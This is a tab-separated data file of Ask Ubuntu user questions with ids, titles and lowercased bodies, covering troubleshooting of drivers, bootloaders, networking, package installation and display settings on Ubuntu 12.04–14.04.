501349	download .deb from software center using a download manager	when trying to install apps from software center or using the apt the download speed is so slow otherwise the speed is well fast when downloading with a download manager like flareget so is there any way to get the download link and put it in flareget to download the .deb
501350	no dropdown menu appears from dropbox indicator on cinnamon	in cinnamon , the dropbox indicator does not have a dropdown menu like in unity . if possible , how can one be made to display ?
501352	in xfce4 , how to set the critical value on the battery level ?	in xfce4 , xfce4-power-manager handles hibernation or suspend when battery power is critical . xfce4-power-manager-settings enables one to change the action but not the critical value . how to set the critical value on the battery level for xfce4-power-manager ?
501353	what will happen on the regular ubuntu forums when ubuntu one is discontinued ?	will there be a different way to register , because currently the only way to register is through ubuntu one . are there other ways to register ? i have n't seen anything about it on google .
501356	why ca n't i install the intel graphics installer app ?	every time i follow the steps to use it , i click the file i downloaded and it pulls up ubuntu software center with an error : dependency not satisfiable : libglib2.0-0 ( > =2.37.3 ) . now i thought i might have to download libglib , so i went into the command line and entered the command : sudo apt-get install libglib2.0-0 and boom , downloaded and installed . when it still did n't work i restarted , still same error message . i 've tried fifteen different approaches to getting my graphics card to operate like it should in the last hour and a half just trying to circumvent this issue when i could n't resolve it . someone please be my hero and just tell me how to make the installer work .
501357	fglrx ubuntu 14.04 32bit blank underscore	i 'm just slightly confused what is happening after installing proprietary drivers , my graphics card is an ati 6870 and after i install fglrx i reboot to find an eternal blinking underscore . removing them and using the generic allows me to run the system but i lose real hardware acceleration in many applications . so instead of removing i reboot and choose the recovery kernel ( 3.13.0-23 ) followed by `` normal boot '' , the login screen appears ( with incorrect underscan ) and i clearly have the fgrlx drivers working properly ! is there a way to recreate whatever the recovery menu `` normal boot '' is doing for my normal grub kernel choice ? i 'd rather avoid the extra steps on boot . thank you !
501363	grub rescue no such device error	i 'm new to ubuntu and linux . and i 'm running into a grub rescue no such device error . i have an older desktop with two hard drives : 60gb and 500gb ( resp . sda and sdb ) . i think they 're pata . i ca n't set /dev/sdb in boot sequence ( probably due to the fact that an older bios ca n't boot from a slave drive ) . i 've just installed ubuntu on /dev/sdb2 , while i selected /dev/sda as 'device for boot loader installation ' and the swap on /dev/sda6/ ( see my related previous question on this site ) . i wanted to make a dual-boot for windows xp ( sp3 ) and ubuntu 14.04 . windows xp is running on /dev/sda2 on a 40gb partition . so i have put / on /dev/sdb2 and i wanted grub to be on /dev/sda because i could not set the boot sequence in bios to boot from /dev/sdb which would be necessary otherwise for booting into grub . when i was all done with installing ubunutu from live dvd , it asked me to 'reboot now ' , so i did . then an ubuntu screen appeared , but like only half the size of my 15 '' monitor in the left upper corner . then nothing ... for over 10 minutes . no reaction to keyboard . so i unplugged the power . now i booted again , and pretty soon a grub rescue error appeared : error : no such device : 2785cb02-5d56-4a3a-8e69-f6f950b92f0e entering rescue mode ... grub rescue > my question is : how do i get from this to a smooth dual-boot system ? i used boot-repair-disk-32bit already , and ran the 'recommanded repair ' . but i still encountered the same grub rescue error afterwards . also running it with 'advanced options ' and checking 'place grub in all disks ' , i still get the error . i did discover that the device mentioned in the error ( 'no such device ' ) is in fact /dev/sdb2 , being the ubuntu partition ( or /root partition ) . this partition showed up in 'filemanager > pcmanfm ' when running it from the boot-repair-disk . and it showed the same number as the error has . i remember while installing ubuntu , and while deleting and making the /dev/sdb2 partition -with mount point /- switching this to 'primary ' , while the default setting was 'logical ' . could this be of influence ? the boot-repair-disk made a few bootinfo summeries . i have these url 's available ( not allowed so may links yet ) . please help me finish this installation . thnx . update : the last boot-repair info from comments
501366	system updated to 3.13 kernel that wo n't boot	recently , i got a message that told me automatic updates to my hardware would end 8/07 and decided to update my system to the latest kernel version 3.13 . i 'm running ubuntu 12.04 on some fairly old hardware . upon loading the kernel panics immediately , however , grub is giving me the option to boot to a previous kernel ( 3.5-54 ) which was working fine . i 'm looking to update to 14.04 eventually , but would like to boot to the old kernel by default . any suggestions ?
501372	intel graphis card not updating . problem with ppa ?	i 'm trying to update my graphics card . info : description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 i tried doing this in two ways : 1 . command line : first add repository : sudo add-apt-repository ppa : glasen/intel-driver second , update : sudo apt-get update this updates everything , then eventually i get a problem : w : failed to fetch http : //ppa.launchpad.net/glasen/intel-driver/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/glasen/intel-driver/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . 2 . intel ( r ) graphics installer for linux : i downloaded it from this site then ran the program , and let it do it 's thing . eventually i got this error : w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 , w : failed to fetch http : //ppa.launchpad.net/glasen/intel-driver/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/glasen/intel-driver/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . both error look the same , but i do n't quite understand it . how do i upgrade my graphics card driver ?
501378	how to install a orig.tar.gz installed package	hey all i downloaded this file ( http : //packages.ubuntu.com/lucid/laptop-mode-tools ) but ca n't seem to be able to uninstall it . i tried looking online as well as the readme file but there is only instruction for installing , not uninstalling the package . attempted solutions : sudo apt-get remove laptop_mode returned e : unable to locate package laptop_mode but when i type in laptop_mode i do get unhandled kernel version : 3.13 ( 'uname -r ' = '3.13.0-32-generic ' ) is there any way i can uninstall laptop-mode-tools ? thanks
501379	ca n't use both display outputs on xps laptop	on a dell xps 15 , running ubuntu 14.04 , the hdmi and displayport ports work fine , but when i plug in two screens to both the dp and hdmi , it does n't work . the screens window showed some error dialogs about bad configuration : could not switch the monitor configuration : could not set the configuration for crtc 64 failed to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code2 : could not set the configuration for crtc 64 when i force the second external screen `` on '' and click apply , the screens go all black except for a nonresponsive cursor . i tried with the nvidia driver app in nvidia ( performance mode ) , or intel ( power saving mode ) . ( after restarting ) . it still does n't allow 2 external screens .
501381	blank screen trying to boot from cd for install	i am pretty convinced as to why linux flavors will never be mainstream for general consumers . it is because of problems like i am encountering . i download and the installer iso and made the cd to install ubuntu . i used it to install on 1 machine just fine . i try to use the same cd to boot another machine in order to install ubuntu and it does not boot . the cd spins , there is some disk activity , the cursor flashes for a bit in the upper left and that 's where it ends . blank screen and nothing else happens ... forever until i reboot . all of the searching i do in google and in these forums do n't result in any comprehensive ... useful information . i am not a geek , so i do n't want to type a bunch of commands to get around this . i would be happy with a simple explanation if someone could be so kind . this is so frustrating . end rant . by the way , i looked around in bios and such for legacy mode , tried xubuntu and some other thingsi found on the forums ... . all fail to get past this blank screen . i can only hit esc when i see what i believe is the grub splash and i get to select the language . but after that is only the small disk activity then blank screen forever .
501382	juju bootstrap ssh no route	the problem is based on the context of virtualbox , they are set on 3 virtual machines whose nodes are associated with a cluster controller , however when it completes the execution of `` juju bootstrap '' this ends with the following result : attempting to connect to node02-080027eb54f9.maas:22 attempting to connect to 10.0.2.22:22 error bootstrap failed : waited for 30m0s without being able to connect : ssh : connect to host 10.0.2.22 port 22 : no route to host note that the node is set to the point that asks `` login '' , but to make `` ping '' the machine is not responding . i hope you can help me , best regards **virtual machine configuration ** cluster controller ram : 2048 mb disk : 80,00 gb if1 : 08:00:27:9e:54 : a6 - 10.0.2.10 ( nat network ) if2 : 08:00:27:22 : f4 : d6 - 192.168.1.37 ( bridge ) node1 ram : 512 mb disk : 8,00 gb if1 : 08:00:27:92:36 : a5 - 10.0.2.20 ( nat network ) node2 ram : 512 mb disk : 8,00 gb if1 : 08:00:27 : eb:54 : f9 - 10.0.2.22 ( nat network )
501385	troubleshooting refresh rate	i have been having problems with my refresh rate and it 's recommended and default rate is 60ghz . it keeps flickering at every rate i put it . does anyone have ideas how to resolve this ? thank you
501386	can i dual boot ubuntu from a virtual cd drive ?	my comp sci professor told me to dual boot ubuntu on my computer to get some experience with the linux os . however , my dvd drive is broken and my bios will not boot from a usb . my professor is telling me that i can dual boot from a virtual cd drive , like daemon tools , but from all the research i have been doing i have n't seen anything stating that this can be done . which would make sense since the virtual cd drive would not be detected on boot up as it is run on the windows os . can anyone confirm or deny this for me ? thanks , rob
501391	computer becoming unresponsive when changing display	i just had a weird issue come up today . i 'm using ubuntu 14.04 on a toshiba satellite laptop with an external monitor . until today , everything was working fine , but i started having a problem . normally i boot up my computer , plug in the monitor , and hit fn + f5 a bunch until i get the external-only display with native resolution ( the resolution of my external monitor is much higher than my laptop 's native resolution ) . however , today , instead of migrating the display to the external monitor , instead , the external monitor went blank and i got an unresponsive command prompt on my laptop 's main display ( i.e . a black screen with the flashing white bar , but i ca n't type anything and none of the keys do anything ) . i 'm wondering how i can fix this and go back to using fn + f5 to set up my display . i have done some debugging , and here 's what i 've found : 1 ) when i go into display settings and manually switch the display to external monitor only , it works fine ( in fact , that 's how i 'm writing this post ) . 2 ) when i do not have my power cable plugged in , sometimes fn + f5 will work as before and alternate the display properly , but sometimes it fails . 3 ) i have tested multiple monitors , and experienced this problem in multiple settings . can someone help me debug this issue ? thanks .
501393	are all apt-get packages available on 64 bit ubuntu version available on the arm version ?	i 'm going to be traveling for 4 months and want to get a $ 200 chromebook and out ubuntu server on it rather than risk loosing my macbook pro . i 'm developer and use apt-get all the time , so wanted to know if all 32/64bit packages are made available for the arm version or if only a subset . some of the stuff i use often are apache , node , mongodb , mysql , ruby , php etc .
501394	ubuntu installer overwriting windows 8 bootloader on disk to which it was n't installed	this all started when i went to install ubuntu on a partition on my external hdd . in the ubuntu liveusb 's installer , the configuration was to create an ext4 partition in empty space on the external hdd ( /dev/sdc3 ) and write the bootloader to /dev/sdc . the install completed nicely and i was able to boot fine into the new ubuntu partition- with one catch . upon restarting , i had been greeted with a complaint from secure boot ( secure boot violation - invalid signature ) , which was odd , given that i had not told the installer to touch the original bootloader ( or anything , for that matter ) on /dev/sda . i got prompted with grub after dismissing the complaint , also strange seeing as i had not gotten to the point where i could choose the boot order . i rebooted without the external hdd to verify that it was on the main drive and not the external one , at which point grub gave me a terminal rather than a menu . typing 'exit ' brought me back into windows 8 . i 've attempted to erase grub by booting into windows in command prompt mode and using bootrec /fixmbr and bootrec /fixboot , but it had no effect and grub remains . so my questions are : why did ubuntu 's installer decide to write grub to both /dev/sda and /dev/sdc when i specified /dev/sdc as the bootloader partition and /dev/sdc3 as the ubuntu install partition ? how can i get rid of grub with something other than windows in recovery mode ?
501400	shell scripting add slashes in file name with space	i am a newbee and want to write a shell script in which i will look up in a certain directory for zip file and unzip it to certain directory . file name can have spaces like this `` harry 's 20 july.zip '' i am getting error when i am trying to unzip using below command : - unzip `` $ source_file '' -p $ password -d $ destination_directory i already enclosed in double quotes but dont know how to add slashes in $ source_file . any help is greatly appreciated . thanks in advance
501401	why is gdm not starting automatically ?	i am running ubuntu 12.04 lts with all updates . at some point i experienced some trouble with lightdm , so after reading up on askubuntu i switched to gdm . no problems , except that i can not get gdm to start automatically . current situation : whenever my system boots , i am shown a cli/text-mode console . i can log in just fine . running `` sudo start gdm '' gets my graphical interface up and everything works smoothly . question : how can i have gdm start automatically ? the permissions on /etc/init.d/gdm are lrwxrwxrwx 1 root root 21 jan 7 2014 /etc/init.d/gdm what i have tried : 1- following mchid 's suggestion , i tried running sudo dpkg-reconfigure gdm it executes without any error message / prompt but , upon rebooting , the problem persists : i am again at a text prompt . 2- following this thread , i tried to run sudo apt-get install -f -m -- reinstall -u gdm but nothing happens : reading package lists ... done building dependency tree reading state information ... done reinstallation of gdm is not possible , it can not be downloaded . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
501404	guest wireless/ubuntu 14.04	at work i have to connect to a guest wireless network . this usually requires me to acces 1.1.1.1/login.html to complete the connection using a set username and password that changes every week . i see the guest wi-fi on the list of available networks , i click on it , trys to connect and never does . eventually it says offline again . never bringing me to login page listed above . any ideas . btw - i was able to login to my private wi-fi network at home with no problems . i also tried it at starbucks today and had no issues . i also tried to login to this guest wi-fi using a windows machine and had no issues either . not sure what to check since i an ubuntu virgin ( only 3 days old ) . i did look in the system settings > software & updates > additional drivers > and noticed a was using the following : broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) was selected . no other options were available under wirelessbg/n controller . =============================================== resolution : lp # 1010931 14e4:4727 [ dell vostro 3555 ] broadcom bcm4313 5ghz does n't work but 2.4ghz does the root cause is the card is single-band only , so it would never broadcast at 5ghz . to fix the 14e4:4727 on ubuntu trusty 14.04 , uses brcmsmac : sudo apt-get purge bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree then you need to blacklist b43 and wl driver like this : echo `` blacklist b43 '' | sudo tee -a /etc/modprobe.d/blacklist.conf echo `` blacklist wl '' | sudo tee -a /etc/modprobe.d/blacklist.conf sudo modprobe -r b43 wl brcmsmac sudo modprobe brcmsmac echo `` brcmsmac '' | sudo tee -a /etc/modules
501409	how do i configure the resolution on an hp envy 15 with an amd radeom 7690m ?	the computer : notebook , hp envy 15 ( 2012 ) amd radeon 7690m also intel hd graphics . the problem : after installing ubuntu 14.04 , my resolution is automatically at 1024x768 and system settings and xrandr give no other options for resolution . while native resolution of notebook is 1920x1080 . as you can imagine , everything is ugly . some solutions i have tried : 1 installing proprietary amd drivers via additional drivers -- while this does fix the resolution , ( at least as far as the login screen on next boot ) as soon as i log in , it stays on blank wallpaper with mouse , it is not frozen as i can ctrl-alt-f2 to access console , i just ca n't load the gui . 2 using xrandr to add mode -- this does not work as it tells me that my chosen mode has resolution larger than maximum . -- i try to remedy this by editing xorg.conf but i have no xorg.conf -- i make an xorg.conf and when i reboot , the same problem as above occurs . ( failing to load gui after login ) 3 downloading amd driver from amd website -- boots into low graphics mode and gives errors . help would be very very appreciated . thank you .
501411	ubuntu 14.04 not booting after installation	i have a vaio pro and had ubuntu 13.10 with efi boot on it which worked fine until i did something wrong . what i did : reinstalled ubuntu 14.04 run boot-repair create the efi/boot/bootx64.efi file on the edi partition but i still ca n't boot . here is my boot-repair log .
501413	how to boot back into android from ubuntu touch ?	i just recently installed ubuntu touch on my nexus 7 2013 tablet following the instructions from : http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/ i was successfully able to boot into ubuntu , but now i am unsure how to boot back into android . i have tried restarting the tablet , but i am not given any option to select a different os . i also do not have the dual boot back to android application either . any assistance would be greatly appreciated !
501418	epson l210 printer is non recognised	i run ubuntu 14.04 and have already downloaded and installed the driver for my epson l210 , but the printer is not recognised . when printing any document , the l210 does not appear in the printer list .
501421	is this partition table ok ?	i made my own partition table . the system is running fine but i doubt that i made it correctly . some people say that the swap must go at the end , so i do n't know if this partition is correct : /dev/sda1 = linux-swap /dev/sda2 : ( extended ) /dev/sda5 ext2=boot /dev/sda6 ext4= / /dev/sda3 ext4=home
501423	ca n't remove 2xclient using dpkg	i have a problem removing 2xclient from ubuntu 12.04 . this is the output removing 2xclient ... unregistering tuxclient url-protocol handler in gconf tree ( gconftool-2:3905 ) : gconf-warning ** : client failed to connect to the d-bus daemon : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . failure during recursive unset of `` /desktop/gnome/url-handlers/tuxclient '' : no d-bus daemon running ( gconftool-2:3905 ) : gconf-warning ** : client failed to connect to the d-bus daemon : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . unregistering tuxclient url-protocol handler in gconf tree grep : /home/sladjanadj/.dbus/session-bus/660680798d27ff1532041eb700000004-0 : no such file or directory dpkg : error processing 2xclient ( -- remove ) : subprocess installed post-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : 2xclient error in function : i tried : ⠀dpkg -- remove -- force-all ⠀dpkg -- purge -- force-all ⠀dpkg -- remove -- force-remove-reinstreq ⠀apt-get -f ⠀removing entry from /var/lib/dpkg/status nothing worked . what can i do ?
501424	can not find -lwebsock	i am installing janus gateway to implement webrtc in ubuntu 14.04 . i have installed all the dependencies according to the documentation , when i run the script using sh install.sh i get the following error : gcc -fstack-protector-all -g -ggdb -rdynamic -o test test.o -lwebsock /usr/bin/ld : can not find -lwebsock collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ test ] error 1 make [ 1 ] : leaving directory `/home/gayan/mydetails/myapplications/virtualclassroomtest/janus-gateway/wstest' make : *** [ wstest ] error 2 the installer could n't find the libwebsock lib , which is needed for websockets you can install version 1.0.4 ( required ! ) with the following steps : wget http : //paydensutherland.com/libwebsock-1.0.4.tar.gz tar xfv libwebsock-1.0.4.tar.gz cd libwebsock-1.0.4 ./configure -- prefix=/usr & & make & & sudo make install [ note : you may need to pass -- libdir=/usr/lib64 to the configure script if you 're installing on a x86_64 distribution ] i have also install the libwebsock using above steps . any kind of help is appreciated .
501428	juju charm failed in local lxc	so i want to run my web application in the local lxc provider using juju.my web application is maven build application . so i create my charm and try to run it locally . in hooks i have installed java and maven for bulding web application . after downloading all the required ( java , maven ) it failed in start script in hooks . install script is fine . this is the start script can anyone tell me how to fix this issue ? # ! /bin/bash set -e sdk_home=/home/ubuntu/application/samples/maven_sampleapp cd $ sdk_home mvn clean install jetty : run this is the error i got when compile application . error : annotations are not supported in -source 1.3 error : generics are not supported in -source 1.3 variable-arity methods are not supported in -source 1.3
501429	xubuntu 14.04 network interface preferences	when i have an ethernet cable connected and wifi pass on available network it prefers the wifi for internet connections . how do i make it prefer the ethernet connection ?
501430	blank screen after logon	with the help of my local freegeek neighbours , i installed ubuntu 3.5.0-49-generic as a dual boot ( grub 1.99-21ubuntu3.14 ) on my old xp machine : mobo : asus p4p800 cpu : pentium 4 , 2.60 ghz ram : 1 gb ( 1024 mb ) video card : ati all-in-wonder 9600 , vga output monitor : viewsonic g220fb crt there was some problem installing , apparently because my video card is set for a horizontal refresh frequency for the crt , much higher than most of the lcd screens around freegeek could handle . one of the gurus there did some fiddling with the startup configuration , and it seemed to work -- or at least , i was able to sign on -- so i took the computer home . fwiw , my configuration ( `` e '' at grub menu ) is : setparams 'ubuntu , with linux 2.5.0-49-generic' recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0a855f98-3434-4cca-b177-0e918b3622d6 linux /boot/vmlinuz-3.5.0-49-generic root=uuid=0a855f98-3434-4cca-b177-0e918b3622d6 ro quiet splash noapic $ vt_handoff initrd /boot/initrd.img-3.5.0-49-generic presumably some of this is default , and some maybe the result of the guru 's tinkering to make things work with my video card . i 'm afraid that it 's gibberish to me . i 'm trying to run it now , and it 's not working : when i choose the old xp from the dual boot prompt , works fine ( in xp , obviously ) when i choose the ubuntu , or allow ubuntu to come up by default , i get the ubuntu logon screen when i logon , i see the ubuntu home screen for maybe 10 seconds , then the screen goes blank ( the monitor tells me that there 's no signal ) if i do n't logon , after a few minutes at the logon screen , the screen goes blank , again with no signal . i 've looked at some answers on this board . one suggested going to terminal mode and : # apt-get install gdm # dpkg-reconfigure lightdm did that ( no complaint or acknowledgement from the command line ) , then startx ; same thing -- logon screen going to blank after logon . the other answers that i saw did n't seem quite to apply to my case . i 've seen some suggestions that some problems might come from some sort of acpi conflicts . in my ( 2003 ) ami bios , `` acpi 2.0 support '' is set to no ; and both `` acpi apic support '' and `` bios- > aml acpi table '' are enabled ; when i disable the latter two , i do n't even get to see the ubuntu logon screen , just a flashing cursor in the upper-left corner . might a new , perhaps less sophisticated , video card help ? any help gratefully accepted . one request , though : since i 'm so new to linux , if you give me some lines of code to type in , maybe you could tell me what they do and why . many thanks . -- howard
501432	after installing ubuntu 12.04 pc goes in grub rescue	as a part of my school lab i did following : starting off with win 7 installed installed 10.04 in remaining space > worked installed 12.04 in amother partition i created finished installation took out the disk . after the 12.04 the system booted into grub rescue mode . i didnt know what to do as i never used ubuntu so i just moved on to install 14.04 as part of lab hoping the previous grub loader problem will be solved then , by replacing grub from cd . after the 14.04 installation i still get the grub resuce prompt .
501435	xubuntu 14.04 driver for nvidia 320m ?	i checked my graphic card in the terminal by lspci | grep vga and i 've got this : 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 320m ] ( rev a2 ) so it is thinking that my graphic card is gt216m , can you give me a driver which will make it think that my card is gt 320m ?
501438	ubuntu 14.04 lts and displaylink dl3900 chipset	do i have a chance to get the displaylink adapter ( chipset 14.04 ) working under ubuntu 14.04 ? i found only articles for ubuntu 13.04 . is it the same under 14.04 ?
501442	how to remove g++	i recently installed the g++ complier for c++ coding somehow its messing with my fonts and only a restart fixes the issue . is there any way to uninstall g++ ? and is that safe to do ?
501443	unmet dependencies when installing openjdk 7 on arm v7 running ubuntu	some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jdk : depends : openjdk-7-jre ( > = 7~u3-2.1.1~pre1-1ubuntu2 ) but it is not going to be installed recommends : libxt-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . sources deb http : //ports.ubuntu.com/ubuntu-ports/ precise main universe deb-src http : //ports.ubuntu.com/ubuntu-ports/ precise main universe
501451	problem with amd hd radeon 8570m graphics card	i have a lenovo essential g505s . i have tried various linux distros but my graphics card seems to have very less support for linux distros . i have an amd hd radeon 8650g ( int ) / amd hd radeon 8570m ( discrete ) graphics . all other devices work perfect but the graphics card . i installed ubuntu 13.04/13.10 and then 14.04 , but none worked with `` swithcable graphics '' activated . although 14.04 worked with uma graphics mode ( integrated rad . hd 8650g ) but had no support for 8570m . i observed colour depth problems ( banding of gradients everywhere ) . i installed amd proprietary drivers and it seemed to work averagely well for integrated graphics but there were still problems with discrete graphics ( 8570m ) . i want to know will i ever get support for my graphics card , or how can i help in the development of driver for my graphics card .
501453	error installing foxit reader using wine	i am trying to install foxit reader on ubuntu 14.04 lts . my installation starts fine , but then halfway through i get the following error : c : \program files ( x86 ) \foxit software\foxit reader\plugins\converttopdfshelllextension_x64.dll unable to register the dll/ock : regsvr32 failed with exit code 0x1 any help will be greatly appreciated .
501457	lock/unlock events for in c++ app which should not depend on screen savers	we have a product , which was developed for windows . because of customer request we are developing it for linux also . so being a beginner to linux , have migrated most of it ( which i loved it ) . now got stuck where i want lock/unlock events to be captured from os ( `` system event notification service ( sens ) '' in windows ) . gone through a lot about gnome screensaver which gives d-bus interface to find out lock/unlock events . if instead xscreensaver is running , which does n't provide any such interface ( i guess ) . is there any concrete solution for this ?
501459	ubuntu installer hangs	i am currently trying to attempt a quadboot with win 7 ( 50gb ssd ) , mac os x maverick , ubuntu & android 4.4 all on a samsung spinpoint s3 500gb hdd , i will also have a wd 1tb hdd for backup and storage . now the best way i found to do this is using ubuntu 's gparted software to create a bunch of partitions before installing mac os x , ubuntu & android . therefore i do not need to install ubuntu first , but instead boot up ubuntu with my usb stick and then use the try option and do the partitions . the boot usb works and it boots into the ubuntu menu to select either install , try , test memory etc . however it does n't boot past a certain point so does n't end up allowing me to get into even the test system . anyone out there have any ideas ? i have tried every version from 10.1 up to 14.01 and nothing is working , they all hang at the same screen . my specs : -amd phenom ii x4 965be 3.4ghz -asus m4a88td-m evo/usb3 amd 880g matx , am3 ddr3 , raid vga/dvi/hdmi , hybrid crossfirex 1394 motherboard -4gb corsair xm3 ddr3 1600 -ocz ssd -samsung spinpoint s3 500gb hdd -wd green 1tb hdd .
501460	whenever i plug my headphones , i hear static noises	whenever i plug in the earphones ( headphones ) in my laptop it starts a static sound , which so annoying . sometimes , for this sound , original media sound ca n't be heard ! note that my laptop 's loudspeaker is out of date ! secondly my headphone port is like a mobile phone 's port . i mean , it has only one port for headphone+microphone . i do n't have a headphone like this . so where is the problem ? my laptop is hp elitebook 2560p it is new and came from foreign country ! it 's loudspeaker was all ok before giving it to me . but now it 's out of date .
501461	manage gpu settings like turn-off v-sync , antialiasing ant etc ?	from the nvidia x server settings i have this : https : //copy.com/rb7ho3d0leoa not the gpu settings i am looking for .
501462	viewsonic monitor and nvidia graphics card : overscan	i am struggeling now for almost half a year with my graphic-configuration ( viewsonic vx2835wm , nvidia geforce gts 450 ) . on a fresh install of ubuntu 14.04 with the proprietary nvidia driver version 331.38 ( the nouveau driver does n't serve any better ) the edges of my screen are cut ( overscan ) . when i used ubuntu 12.04 i could fix this problem . back then i found out that the monitor sends bad edid information . as a result wrong values were used for the configuration ( vertical sync , horizontal refresh ) . however , my old xorg.conf could n't solve the issues under ubuntu 14.04 . i tried to implement it in many variations , but nothing really worked . here is the old xorg.conf that fixed the problem under ubuntu 12.04 : section `` device '' identifier `` gfgts450 '' driver `` nvidia '' option `` nologo '' `` true '' screen 0 option `` modevalidation '' `` dfp-1 : nomaxpclkcheck '' endsection section `` monitor '' identifier `` vx2835wm '' horizsync 24.0 - 82.0 vertrefresh 50.0 - 85.0 option `` preferredmode '' `` 1920x1200 '' modeline `` 1920x1200_60.00 '' 193.16 1920 2048 2256 2592 1200 1201 1204 1242 -hsync +vsync option `` exactmodetimingsdvi '' `` true '' gamma 1 endsection section `` screen '' identifier `` default screen '' device `` gfgts450 '' monitor `` vx2835wm '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` 1920x1200 +0+0 '' option `` useedid '' `` false '' subsection `` display '' depth 24 modes `` 1920x1200 '' endsubsection endsection my current xorg.conf which proides the overscan issue looks like this : # nvidia-settings : x configuration file generated by nvidia-settings section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` viewsonic vx2835wm '' horizsync 30.0 - 82.0 vertrefresh 50.0 - 85.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gts 450 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` 1920x1200_60 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection can someone identify the specific problem ? thanks a lot ! simon
501465	issue with amd drivers ( 14.04 )	i have an ubuntu 14.04 installation and my system has an amd 7730m hd radeon notebook graphics card.i installed the nouveau drivers and tried switching graphics card through the catalyst center by entering the command ( i have a dual graphic card config - intel and amd ) : sudo amdcccle but , it gave me the following message : so , i thought it might be a driver issue . then i went to amd 's website and downloaded the latest stable release for linux . trying to execute the run file gave me the following screen ( i was trying to install via the gui ) : i 'm totally stuck and i have no idea why all this is happening . all i need to do is execute some opengl code on my amd graphics card . any idea how i can get over these issues ?
501466	how to set mtu for autoconfigured interfaces	i have a computer that may have multiple network devices , which are only in some cases available . currently all network devices are configured completely automatically . now i need to set the mtu for all network interfaces except for lo . however i can not figure out where i can configure this . my /etc/network/interface is as follows : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback i already tried adding scripts in /etc/network/if-up.d , /etc/dhcp/dhclient-exit-hooks.d and /etc/dhcp3/dhclient-exit-hooks.d , but none of these scripts seem to get executed . i never did anything to configure these networks , they just always worked out of the box . i do not want these networks to be configured statically , since only some of them may be present at any time , and i want to skip dhcp etc . during bootup if the network is not available . for a while i had a configuration for some of these networks in /etc/network/interfaces but this greatly increased bootup time so i removed it . where can i set the mtu in this case ?
501469	can not `` see '' work pc 's when connected on vpn from my home	i have created a vpn connection ( my router at my work office allowed could do this ) from my home pc to my work office . when i connect to my work vpn all seems great as my ip address changes to the static ip of my work and not my local ip from home . my problem is that when i run the following command to show all the office pcs it returns nothing . ( there are 10 working pcs in my small office ) sudo arp-scan -l this means that when i want to `` rdesktop '' into one of these computers , i can not . does anyone know why this is the case ?
501471	why am i getting the terminal error `` try apt-get -f install '' ?	okay , i just install ubuntu ( the lxde version , which is lubuntu ) and everytime i try to install a package through the terminal with the `` apt-get install '' command , this error pops up : e : unmet dependencies . try 'apt-get -f install ' with no packages and , yes this is for every package i try to install . when i do apt-get -f install this is the terminal output i receive : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libc-bin the following new packages will be installed : libc-bin 0 upgraded , 1 newly installed , 0 to remove and 3 not upgraded . need to get 0 b/1,168 kb of archives . after this operation , 3,532 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17. dpkg : warning : 'ldconfig ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) could someone please help me ? i just started using linux 2 months ago , and switched to lubuntu .
